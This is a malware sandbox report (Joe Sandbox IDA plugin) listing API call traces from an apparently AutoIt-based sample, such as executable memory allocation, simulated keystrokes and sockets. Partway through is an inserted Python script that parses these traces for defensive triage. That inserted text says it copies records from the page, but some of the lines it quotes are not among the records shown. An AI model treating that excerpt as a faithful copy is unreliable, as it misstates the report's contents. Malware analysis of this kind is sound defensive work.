                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 9515c2b54341c95dd900590ae069a1ede020091603f1d0e182c00f5e015bac50
                                                            • Instruction ID: 6676ced5af4a73e4b536481d91476e73e3aec5d4f075e3330cc1fa65575cc853
                                                            • Opcode Fuzzy Hash: 9515c2b54341c95dd900590ae069a1ede020091603f1d0e182c00f5e015bac50
                                                            • Instruction Fuzzy Hash: 64D0C230520313DFC7308F70EA0C24376E4AF19342B00C83A9885D2550D670E8E0CA10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 8ec7ae80cdcc6fc49a1379490a2c7b20f729a6431b6d3048c436ed214033aa43
                                                            • Instruction ID: 4135825ebb82dce1aa2ad6a286c0920866ae12c9b0291f05db32bb6dc02c840b
                                                            • Opcode Fuzzy Hash: 8ec7ae80cdcc6fc49a1379490a2c7b20f729a6431b6d3048c436ed214033aa43
                                                            • Instruction Fuzzy Hash: ACD012B5804559FACB5C9A919C45DFE737CA715311F550692B902D1000F3349B959B25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c5feed2cd76f3618520bf0e346b002977a3a67501c07aef36daa037e0839b81
                                                            • Instruction ID: bdab3fb43457b48306456fd2d17560cd67f594f833d9d2612bdd301133c88e8c
                                                            • Opcode Fuzzy Hash: 9c5feed2cd76f3618520bf0e346b002977a3a67501c07aef36daa037e0839b81
                                                            • Instruction Fuzzy Hash: A8C18E75A0421AEFCB14DF94C888EBEB7B5FF48714B158598E906EB291D730ED81CB90
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0021E3D2
                                                            • CharLowerBuffW.USER32(?,?), ref: 0021E415
                                                              • Part of subcall function 0021DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0021DAD9
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0021E615
                                                            • _memmove.LIBCMT ref: 0021E628
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: a56fb83fb2102511d6c8829f8ee8c55c8e910bee1bc166be3aacd798b2cd447e
                                                            • Instruction ID: 5e2bd06a42b917b5ce9a510243e3e08186d6d6631388cb6101938e26ae8de107
                                                            • Opcode Fuzzy Hash: a56fb83fb2102511d6c8829f8ee8c55c8e910bee1bc166be3aacd798b2cd447e
                                                            • Instruction Fuzzy Hash: 3EC17A716183019FCB14DF28C88096ABBE5FFA9714F05896DF8999B351D730E985CF82
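The records above show the AutoIt runtime resolving Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW and GetModuleHandleExW at run time through LoadLibraryA/GetProcAddress pairs, and a VirtualAlloc call with flAllocationType 0x3000 (MEM_COMMIT | MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE), i.e. a writable and executable region. Reading such records by hand is tedious, so the following Python is an added example (not part of the Joe Sandbox report and not code from the sample) that parses the "APIs" lines into per-function records, pairs each LoadLibrary with the symbols fetched by GetProcAddress, decodes the VirtualAlloc flags and names the control messages. The excerpt it runs on is copied from the records on this page; the message names for values above WM_USER (0x400) are class-private and assume the control class that each record's String ID names (Listbox, msctls_trackbar32, SysMonthCal32).

```python
import re

# Constructed excerpt: "APIs" lines copied from the report records above.
SAMPLE_REPORT = """\
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002279E1
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002279F6
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00227A03
Strings
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,001A4D2E,?,001A4F4F,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001A4D81
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,002212C1), ref: 00221080
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00221092
Strings
APIs
• CharLowerBuffW.USER32(?,?), ref: 0021E3D2
  • Part of subcall function 0021DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0021DAD9
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0021E615
• _memmove.LIBCMT ref: 0021E628
"""

# One report line: "• [Part of subcall function X: ]Name.MODULE(args), ref: ADDR"
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants from winnt.h / commctrl.h, only what these records need.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# Values >= WM_USER are class-private; names assume the control class the
# record's String ID names (Listbox, msctls_trackbar32, SysMonthCal32).
MESSAGES = {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL",
            0x0405: "TBM_SETPOS", 0x0406: "TBM_SETRANGE", 0x0414: "TBM_SETTICFREQ",
            0x1002: "MCM_SETCURSEL", 0x1009: "MCM_GETMINREQRECT"}


def as_int(tok):
    """Hex argument -> int; '?' and string literals such as kernel32.dll -> None."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def parse_records(text):
    """Split the report on 'APIs' headers; return one list of calls per function."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.search(line)
        if not m:
            continue
        if current is None:          # calls before any header: open a record
            current = []
            records.append(current)
        args = m.group("args")
        current.append({
            "name": m.group("name"), "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref"), "subcall": m.group("sub") is not None,
        })
    return records


def decode_virtualalloc(args):
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)."""
    size, alloc, prot = (as_int(a) for a in args[1:4])
    prot = prot or 0
    return {
        "size": size,
        "alloc_type": [n for bit, n in MEM_FLAGS.items() if alloc and alloc & bit],
        "protect": PAGE_PROT.get(prot & 0xFF, hex(prot)),
        "rwx": (prot & 0xC0) != 0,   # PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY
    }


def decode_sendmessage(args):
    """SendMessageW(hWnd, Msg, wParam, lParam)."""
    msg, wparam, lparam = (as_int(a) for a in args[1:4])
    out = {"msg": MESSAGES.get(msg, hex(msg) if msg is not None else "?"),
           "wparam": wparam, "lparam": lparam}
    if out["msg"] == "TBM_SETRANGE" and lparam is not None:
        out["range"] = (lparam & 0xFFFF, lparam >> 16)   # lParam = MAKELONG(min, max)
    return out


def triage(text):
    """Collect the points a reviewer wants: dynamic imports, RWX allocations, messages."""
    summary = {"dynamic_imports": [], "rwx_allocs": [], "messages": []}
    for calls in parse_records(text):
        lib = None
        for c in calls:
            if c["name"] in ("LoadLibraryA", "LoadLibraryW") and c["args"]:
                lib = c["args"][0]
            elif c["name"] == "GetProcAddress" and len(c["args"]) > 1:
                summary["dynamic_imports"].append((lib, c["args"][1]))
            elif c["name"] == "VirtualAlloc":
                d = decode_virtualalloc(c["args"])
                if d["rwx"]:
                    summary["rwx_allocs"].append((c["ref"], d["size"], d["protect"]))
            elif c["name"] == "SendMessageW":
                summary["messages"].append(decode_sendmessage(c["args"])["msg"])
    return summary


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(key, value)
```

The resolver pairing is per record, which matches how the report groups a LoadLibraryA with the GetProcAddress that follows it; across the whole page the same parser turns the long run of identical "Memory Dump Source" blocks into a short list of resolved symbols, RWX allocations with their code references, and the control messages each GUI helper sends.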
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 002183D8
                                                            • CoUninitialize.OLE32 ref: 002183E3
                                                              • Part of subcall function 001FDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001FDAC5
                                                            • VariantInit.OLEAUT32(?), ref: 002183EE
                                                            • VariantClear.OLEAUT32(?), ref: 002186BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 0f7bd7a2bfec58502b18780d137fe88456280b8a01dd3b95a08ea9b68bdca6e9
                                                            • Instruction ID: a6dc9c1594ab5b9e1d81e80c123bd01fc020abb1240e3c28b8c978ec0010417a
                                                            • Opcode Fuzzy Hash: 0f7bd7a2bfec58502b18780d137fe88456280b8a01dd3b95a08ea9b68bdca6e9
                                                            • Instruction Fuzzy Hash: B4A15839214702AFCB10DF14C481B6AB7E5BFA9314F14445DF99A9B3A2CB30ED90CB82
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: a2b1fb38ed059fe8e7f93913f181536b5adc2d10b7792c1534cd1e634f412232
                                                            • Instruction ID: d4afde9a1404660bd67a6f246066302add818ced819efbba801c7eb6046f5384
                                                            • Opcode Fuzzy Hash: a2b1fb38ed059fe8e7f93913f181536b5adc2d10b7792c1534cd1e634f412232
                                                            • Instruction Fuzzy Hash: 0B5196356083099BDB24AF65E895A7EB3E5AF59310F20882FF756CB2D1DF709880DB11
                                                            APIs
                                                            • GetWindowRect.USER32(00B9EBC0,?), ref: 00229AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00229B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00229B72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 6be4cd5ef39df9a10ea64fc53cd72c7ffa3165072453d966912e7e957c9c3e58
                                                            • Instruction ID: 6e1cb1dca10d5b2a51c258f3de76066bcb93a4958a02180f98a980c97c22b15a
                                                            • Opcode Fuzzy Hash: 6be4cd5ef39df9a10ea64fc53cd72c7ffa3165072453d966912e7e957c9c3e58
                                                            • Instruction Fuzzy Hash: 98516334910219FFCF20CFA8E9849AE7BB5FF44324F108169F8559B290D730AD91CB90
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00216CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216CF4
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00216D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216D64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: b803e27529a6e4f73eac1b5f8c493e3a4d7921ec9487ede4fb3d7dd4101be35a
                                                            • Instruction ID: 3cd1b3b9efb0e14e4c64bccff95e5d950d8286cbe03982aa0745a566d139afef
                                                            • Opcode Fuzzy Hash: b803e27529a6e4f73eac1b5f8c493e3a4d7921ec9487ede4fb3d7dd4101be35a
                                                            • Instruction Fuzzy Hash: 0E41B279740200AFEB20AF24DC8AF7EB7E59B15B14F448058FA599B2D2DB719C418B91
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0022F910), ref: 002167BA
                                                            • _strlen.LIBCMT ref: 002167EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 032364bd58a95f746579a75fba532ddd8166d0bad82645d681c1b1355fc17f65
                                                            • Instruction ID: 3149baa55482509f82b4dccd44bbc86bc88e09882897c2a1fc13feb24ca9d9be
                                                            • Opcode Fuzzy Hash: 032364bd58a95f746579a75fba532ddd8166d0bad82645d681c1b1355fc17f65
                                                            • Instruction Fuzzy Hash: 6241C635A10104ABCB14EBA4DCC5FFEB3E9EF65314F148169F8159B292DB30AD95CB90
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0020BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0020BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0020BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0020BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: cf63b73020f0504fc4a7bc36ac16f15ad7d11b77d5683fcb8eb443aa16712fd4
                                                            • Instruction ID: fc56dd00ee71abfae52d3b5a882823fc89ec323a3d3830d7a0106485c55c3bda
                                                            • Opcode Fuzzy Hash: cf63b73020f0504fc4a7bc36ac16f15ad7d11b77d5683fcb8eb443aa16712fd4
                                                            • Instruction Fuzzy Hash: C7412939200611EFCB21EF15C584A5EBBE1EF5A314B098499EC4A9B772CB34FD41CB91
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00228B4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: bf7d4a3d486b905f41b8c874d11e3124bb93ec84e2f32d722d623c158b16c18e
                                                            • Instruction ID: c311cea96d1241d01e6881a6198d36e301c84c930c95062766b16be61f032a25
                                                            • Opcode Fuzzy Hash: bf7d4a3d486b905f41b8c874d11e3124bb93ec84e2f32d722d623c158b16c18e
                                                            • Instruction Fuzzy Hash: 0B310875622225BFEF308ED8FC49FA937A4EB09318F54851AFA51D72A0CF70D9608B41
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0022AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0022AE90
                                                            • PtInRect.USER32(?,?,0022C304), ref: 0022AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0022AF11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 943f73b06b4ddaaa75b08013c1ee7bd341fe33cb3815d7ecc7a4bc55d4cfa71f
                                                            • Instruction ID: 3232057a04ab9ae8a6610d5871b77184aae5a39e404398dbc4a93f69314a0718
                                                            • Opcode Fuzzy Hash: 943f73b06b4ddaaa75b08013c1ee7bd341fe33cb3815d7ecc7a4bc55d4cfa71f
                                                            • Instruction Fuzzy Hash: 2241B370610126EFCB11CF98E988B69B7F5FF88310F158079E414DB651D771A812CF92
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00201037
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00201053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002010B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0020110B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 5863ec0f220a050fa624dc0a8027d935f3ff5ed16c9f4f39cad6496eed0fee26
                                                            • Instruction ID: 45087ef06b969f3455259c09cc1688410d37384b1035bcc795ee87abbfc2d696
                                                            • Opcode Fuzzy Hash: 5863ec0f220a050fa624dc0a8027d935f3ff5ed16c9f4f39cad6496eed0fee26
                                                            • Instruction Fuzzy Hash: DC314830E60789AEFB348F658C09BFABBBAAB45310F44432AE9D0521D3C37589F59751
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00201176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00201192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 002011F1
                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00201243
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 21f0cc54de11f18025adc497cba3f146cd7743b2ade71304fe1e1dbb36fcad1a
                                                            • Instruction ID: ba38297751b9e931939dc27d4935030d3ca774f0580ff51be8f231cd08baa6ce
                                                            • Opcode Fuzzy Hash: 21f0cc54de11f18025adc497cba3f146cd7743b2ade71304fe1e1dbb36fcad1a
                                                            • Instruction Fuzzy Hash: E13148309607196EFF388EA58C097FAFBBAAB49314F04431EF584921D3C37449B59751
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001D644B
                                                            • __isleadbyte_l.LIBCMT ref: 001D6479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001D64A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001D64DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 4d62530565ae939358a3e00ad6c9a441797229e6324d1c44e882953eefcfec2d
                                                            • Instruction ID: e52b01db767bc69bf1fff32e032eba32f3d5eecf4dd60d69b96c4a1f5ada30d1
                                                            • Opcode Fuzzy Hash: 4d62530565ae939358a3e00ad6c9a441797229e6324d1c44e882953eefcfec2d
                                                            • Instruction Fuzzy Hash: FE31D131604256EFDB258F75CD49BBA7BB5FF40310F15842AF864872A1EB31D891DB90
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00225189
                                                              • Part of subcall function 0020387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00203897
                                                              • Part of subcall function 0020387D: GetCurrentThreadId.KERNEL32 ref: 0020389E
